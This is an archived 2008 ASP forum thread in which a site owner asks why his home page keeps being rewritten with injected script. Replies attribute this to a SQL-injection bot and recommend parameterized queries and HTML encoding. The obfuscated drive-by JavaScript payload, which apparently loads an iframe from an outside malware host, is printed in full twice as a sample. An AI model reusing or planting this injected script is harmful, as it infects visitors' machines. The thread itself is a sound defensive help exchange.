Sign In | Register Now About Bytes | Help | Site Map
Connecting Tech Pros Worldwide
Bytes > Archives > ASP

new type of injection? rewrite default document?

Question posted by: Brian Bozarth (Guest) on July 11th, 2008 09:25 PM
This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c 9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269 70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
in my machine because i think i have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.

Brian


ThatsIT.net.au's Avatar
ThatsIT.net.au
Guest
n/a Posts
July 13th, 2008
01:55 AM
#2

Re: new type of injection? rewrite default document?
It would seem you have a virus on your machine that is adding the code.

this is just a thought I don't know it it will work, but try auditing access
to the file. maybe then you can at least see what user the virus is running
under. look in your task manager for processes running

"Brian Bozarth" <brian@spaceboyinteractive.comwrote in message
news:eRZypv54IHA.2060@TK2MSFTNGP02.phx.gbl...
Quote:
This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home
page. What it's doing is putting in script code at the top or bottom of
the home page... it looks something like this:
>
<script>function xy1q4877d47d91a36(q4877d47d92209){ function
q4877d47d929d5 () {return 16;} return
(parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c 9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269 70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>
>
What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the
popup in my machine because i think i have a newer version of IE. But
some people have complained that it is installing a virus on their
machine.
>
Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.
>
Has anyone encountered this before? Because I'm stumped as to the cause
of it. I don't see the issue on our dev server. It seems to be IIS on
a shared host.
>
Brian
>


Bob Barrows [MVP]'s Avatar
Bob Barrows [MVP]
Guest
n/a Posts
July 13th, 2008
12:05 PM
#3

Re: new type of injection? rewrite default document?
Brian Bozarth wrote:
Quote:
This is weird, I'm pretty familiar with SQL Injection - but we're
getting these weird injection that is writing in the default document or
home
page. What it's doing is putting in script code at the top or bottom of
the
home page... it looks something like this:
>


Browse through the several threads about sql injection that have been posted
in the last couple weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/foru...4997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/ar...art-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses google to find sites
that might be vulnerable to sql injection, based on the use of querystrings
in the urls. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data tretrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group...2e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries
as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&...FTNGP12.phx.gbl

http://groups.google.com/groups?hl=...ftngp13.phx.gbl


SQL Server:

http://groups.google.com/group/micr...09dc1701?hl=en&


2. Use Server.HTMLEncode when writing data to Response



--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"


 
Not the answer you were looking for? Post your question . . .
189,872 Experts ready to help you find a solution.
Sign up for a free account, or Login (if you're already a member).

Latest Articles: Read & Comment
  • Didn't find the answer you were looking for?
    Post Your Question
    • Top Community Contributors
    Quick Browse:
    Communities / Archives
    XML / CSS | HTML | Javascript | PHP | Perl | Visual Basic | Python | C++ / C | Java | .NET / C# / VB / XML / ASP.net | ASP
    PostgreSQL | MS SQL | Oracle | IBM DB2 | MS Access | MySQL

    About Bytes | Sitemap | Privacy Policy | Terms of Use
    Copyright 1995-2008 Bytes.com. All rights Reserved